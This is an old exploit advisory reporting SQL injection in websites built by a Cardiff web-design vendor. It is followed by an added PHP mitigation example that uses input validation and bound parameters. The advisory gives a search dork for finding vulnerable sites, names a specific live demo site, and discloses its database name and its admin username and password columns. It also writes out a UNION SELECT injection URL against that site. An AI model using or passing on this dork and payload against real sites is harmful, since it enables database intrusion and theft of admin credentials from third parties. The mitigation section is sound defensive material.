Website Design Cardiff suffers from a remote SQL injection vulnerability.
9fb16c16ea10f1e8ab6415d84c27188754c2862797de36e6bc36d57da8055092
########################################################
~ Exploit Title: Website Design Cardiff SQL Injection
~ Author: Th4 MasK
~ Vendor : http://www.ep-projects.co.uk/
~ Date : 24.04.2012 ~
~ Platform : PHP ~
~ Tested On : BackTrack 5
~
Dork : created by Website Design Cardiff
//
~ Demo Site :
http://www.cardiffscuba.co.uk/viewdivetrip.php?id=11 [SQL]
Database : db373049730
Tables : shop_admin
Columns : admin_name,admin_pass
Exploit :
http://www.cardiffscuba.co.uk/viewdivetrip.php?id=11+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9--
************************************************ **************
* Greetz: http://TurkWebSecurity.Net ~ DarkDevilZ.iN ~ SanalHarekat.Org*
* Contact to ; th4_mask[at]windowslive.com *
* Darkness Devil,DeaDSLayeR,MuHuR,Evillord,Karatay *
************************************************ **************
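
Mitigation sketch for the `id` parameter reported above, as an added example that is not part of the original advisory and not the vendor's code: the value is validated as an integer and then passed as a bound parameter, so the UNION payload shown in the advisory never reaches the SQL parser. The table `dive_trips`, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs on its own.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in database with constructed sample data (SQLite in memory).
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE dive_trips (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO dive_trips (id, title) VALUES (11, 'Constructed sample trip')");
    return $pdo;
}

// Accept only a positive decimal integer; everything else is rejected before any SQL.
function parse_trip_id(?string $raw): ?int {
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look up one trip; the id travels as a typed bound parameter, never as SQL text.
function find_trip(PDO $pdo, ?string $rawId): ?array {
    $id = parse_trip_id($rawId);
    if ($id === null) {
        return null; // caller should answer 400 or 404 without echoing the input
    }
    $stmt = $pdo->prepare('SELECT id, title FROM dive_trips WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// In the real page $raw would be $_GET['id'] ?? null.
$pdo = demo_db();
$inputs = ['11', '11 AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9--', '', 'abc', null];
foreach ($inputs as $raw) {
    $trip = find_trip($pdo, $raw);
    if ($trip === null) {
        echo 'rejected: ', var_export($raw, true), PHP_EOL;
    } else {
        // Escape on output as well, so stored data cannot inject markup.
        echo 'found: ', htmlspecialchars($trip['title'], ENT_QUOTES, 'UTF-8'), PHP_EOL;
    }
}
```

With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the binding is done by the server, and give the web application's database account no rights on tables such as shop_admin that the page does not need.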